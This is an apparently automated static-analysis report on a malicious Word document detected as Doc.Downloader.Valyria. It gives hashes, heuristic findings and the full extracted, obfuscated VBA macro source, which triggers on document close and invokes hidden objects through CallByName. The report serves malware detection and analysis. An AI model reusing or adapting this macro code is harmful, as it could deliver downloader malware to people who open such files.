Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c8d4f8a653023a25…

MALICIOUS

Office (OOXML)

83.1 KB Created: 2021-01-29 09:59:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 4ac16e16645f91f2f459ebe16254ecb6 SHA-1: 227ea258bd634ec15d26b2a490e8294964b1ea9d SHA-256: c8d4f8a653023a2501791260d24f0f29feb21c071c94119dd468baa61509a617
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set f0o = CreateObject(UserForm1.vq & UserForm1.fu)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set ed = CallByName(f0o.Workbooks, UserForm1.hn & UserForm1.py, 1, UserForm2.ComboBox1, , , , UserForm1.jh)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6971 bytes
SHA-256: df0faee35689b105082d92da9aef2e8c54152e6ec00accf86bdf2d7940b6ecb4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public bm, ci, e1, g3, d, f0o, at, qy, rb, s7, it, ei, j9, zs, gd, i

Sub Document_Close()

o6

End Sub

Sub o6()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set f0o = CreateObject(UserForm1.vq & UserForm1.fu)

lg = UserForm2.ComboBox10

f0o.DisplayAlerts = False

ts = 1301

f9 = 0

Err.Number = 0

While ts <> 0 And f9 < 32

Set ed = CallByName(f0o.Workbooks, UserForm1.hn & UserForm1.py, 1, UserForm2.ComboBox1, , , , UserForm1.jh)

ts = Err.Number

f9 = f9 + 16

Wend

If ts <> 0 Then

iwn = UserForm2.ComboBox25

ErrHandler:

k = CallByName(Application, UserForm1.ep & UserForm1.d3, 2)

If k <> False Then

Set a2 = CreateObject(UserForm1.i5 & UserForm1.nc)

k0 = UserForm2.ComboBox22

CallByName a2.Documents, UserForm1.hn & UserForm1.py, 1, ActiveDocument.FullName, , True

CallByName a2, UserForm1.ly & UserForm1.op, 1, Now + TimeSerial(0, 0, 2), UserForm1.rd & UserForm1.e2 & "o6"

Else

CallByName Application, UserForm1.ly & UserForm1.op, 1, Now + TimeSerial(0, 0, 17), UserForm1.rd & UserForm1.e2 & "o6"

End If

f0o.Quit

Exit Sub

End If

Dim os

n = UserForm2.ComboBox3

Set os = f0o.sheets(1)

xu = "'"

i = f0o.sheets(5).Cells(1, 1)

If Len(i) < 1 Then

If f0o.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

gg = f0o.sheets(1).Cells(29, 46).Value

k3 = UserForm2.ComboBox12

l3 = os.Cells(111, 27).Value

s7 = os.Cells(99, 21).Value

it = f0o.sheets(2).Cells(142, 2).Value

d = f0o.sheets(2).Cells(10, 29).Value

f0 = f0o.sheets(2).Cells(109, 9).Value

oz = f0o.sheets(1).Cells(101, 9).Value

d5 = f0o.sheets(3).Cells(111, 42).Value

n3 = f0o.sheets(2).Cells(20, 28).Value

ah = f0o.sheets(1).Cells(113, 41).Value

m4 = UserForm2.ComboBox21

j9 = f0o.sheets(2).Cells(110, 59).Value

at = os.Cells(109, 14).Value

rb = f0o.sheets(3).Cells(87, 42).Value

xul = f0o.sheets(3).Cells(38, 31).Value

c5 = f0o.sheets(2).Cells(5, 27).Value

ei = f0o.sheets(1).Cells(124, 10).Value

nv = UserForm2.ComboBox4

pb = f0o.sheets(1).Cells(98, 50).Value

fv3 = f0o.sheets(2).Cells(70, 1).Value

bm = f0o.sheets(3).Cells(27, 18).Value

im = f0o.sheets(3).Cells(93, 33).Value

bl = f0o.sheets(1).Cells(60, 26).Value

u5j = UserForm2.ComboBox27

qy = f0o.sheets(3).Cells(22, 10).Value

ci = f0o.sheets(3).Cells(124, 41).Value

j1x = UserForm2.ComboBox27

kd = f0o.sheets(3).Cells(87, 20).Value

p5 = f0o.sheets(2).Cells(63, 33).Value

gd = ""

Set Sh1 = f0o.sheets(4)

ag = 1

cb = True

While cb

hb7 = Sh1.Cells(ag, 1).Value

If Len(hb7) < 1 Then

cb = False

Else

gd = gd & hb7

End If

ag = ag + 1

Wend

fg = CallByName(f0o, ah, 2)

n6 = UserForm2.ComboBox8

UserForm1.qr.Value = oz & fg & fv3

UserForm1.la.Value = l3

CallByName CreateObject(p5), bl, 1, UserForm1.qr, pb, UserForm1.la

Set jcd = CreateObject(gg)

Set c9 = CallByName(jcd, f0, 2)

Set rc = CallByName(c9, kd, 1)

Set rb = CallByName(jcd, rb, 2)

pu = UserForm2.ComboBox14

Set g3 = jcd

crk = UserForm2.ComboBox27

eu = UserForm2.ComboBox16

UserForm5.ComboBox1 = "et"

Set bm = CallByName(zs, bm, 2)

qy = CallByName(bm, qy, 2)

UserForm1.gmg.Value = im & d5

UserForm3.ComboBox1 = n3

UserForm1.gmg.Value = xul

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = qy

jcd = a4

gb = UserForm2.ComboBox27

ed = j

os = c7o

c9 = by

bno = UserForm2.ComboBox7

rc = f7

rb = v9

s7 = b51

it = be

zs = le

bm = jl

g3 = xgm

DoEvents

mp = UserForm2.ComboBox7

CallByName f0o, c5, 1

f0o = h1

hk = UserForm2.ComboBox16

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{BD8F9E83-3336-4AFE-BFAA-929F15E52D17}{A01F3C2C-0DC4-4B39-939A-EED50EA8673C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{798FF0C9-54A6-460E-B7DE-612ADFD4F751}{9D469B2D-C81B-4B9A-858C-310C33BFDEE2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 dv = UserForm2.Controls.Count - 1
 
 
 

ID = UserForm2.ComboBox25

 

 hma = ""
 For h5 = 1 To dv Step 2
 hma = hma & UserForm2.Controls.Item(h5)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"

ox = UserForm2.ComboBox8

 ComboBox1.AddItem hma
 ComboBox1.AddItem "gz"

rp = UserForm2.ComboBox9

 

jm = UserForm2.ComboBox5

 
 
 
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{8D89A438-1756-45FE-B39C-4309DBA34446}{98420ACD-B730-4ACB-A55E-AB73DFC5370E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()

dy = UserForm2.ComboBox11

 CallByName ActiveDocument.bm, ActiveDocument.at, VbMethod, 1, ActiveDocument.qy
 CallByName ActiveDocument.bm, ActiveDocument.ci, VbMethod, UserForm1.gmg.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{5275753D-C15B-4D0D-9FA0-1CAD5A6DA997}{5BCA7890-C56D-41BB-893F-8CA11C6F9B6A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.g3, ActiveDocument.d, VbMethod, UserForm1.gmg.Value, ActiveDocument.gd, ActiveDocument.i
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{61EC9321-4325-44CC-A8D3-321B7041B8D9}{A247DC6D-29F1-4ED4-8C59-F21DB73B00CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.s7 = CallByName(ActiveDocument.rb, ActiveDocument.s7, VbGet)
 Set ActiveDocument.it = CallByName(ActiveDocument.s7, ActiveDocument.it, VbGet)
 Set ActiveDocument.zs = CallByName(ActiveDocument.it, ActiveDocument.ei, VbMethod, ActiveDocument.j9)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 50688 bytes
SHA-256: e78fb54b2575cebb53336b5ea339eaf4a8d135bdb8a22b298281d673f25bfbc4
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely